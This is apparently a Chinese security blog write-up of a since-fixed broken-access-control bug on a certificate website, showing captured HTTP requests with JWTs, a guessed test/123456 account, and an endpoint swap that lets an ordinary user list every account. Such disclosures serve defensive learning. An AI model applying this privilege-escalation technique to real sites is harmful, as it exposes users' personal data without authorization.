声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
本次文章由知识星球内部群成员投稿,漏洞提交已修复。
对于现在的证书站来说,外网打起来难度有点大(大佬除外哈~),可以有账号直接冲,要么就自己注册个账号冲。
先注册的一个账户,抱着试一试看一看的态度,看看有没有漏洞
123@qq.com
123456
抓这个包
-
GET /api/v1/exproom HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept:/ Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrZW4iLCJpYXQiOjE2OTU0NzgyNjcsInRva2VuIjp7ImlkIjoyMTQwLCJsb2dpbl90aW1lIjoxNjk1NDc4MjY3fSwiZXhwIjoxNjk1NDc4Mjc3fQ.fLQL9MEEaIKkyeKhRHYx250-zkFrE58LsTG96qeYCk0 X-Requested-With: XMLHttpRequest Connection: close
查看到这里应该是有test用户
test/123456
查看到一些账户
所有学生账户
如果这个拥有了test权限,尝试越权
/api/v1/user?agencyautoid=13&get_users_by_agency_root=
保留这个接口,后面给普通用户,替换接口达到越权
-
GET /api/v1/user?agencyautoid=13&get_users_by_agency_root= HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept:/ Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close
在切换到普通用户
123@qq.com
123456
抓这个包
GET /api/v1/user?autoid=2140 HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrZW4iLCJpYXQiOjE2OTU0NzkyMDAsInRva2VuIjp7ImlkIjoyMTQwLCJsb2dpbl90aW1lIjoxNjk1NDc5MjAwfSwiZXhwIjoxNjk1NDc5MjEwfQ.bVL0jdL55frL-vfl6oz4qKsE1ivjpECGC8_JC_T3_so
X-Requested-With: XMLHttpRequest
Connection: close
替换接口后
所有用户都在这里
欢迎大家关注"湘安无事"公众号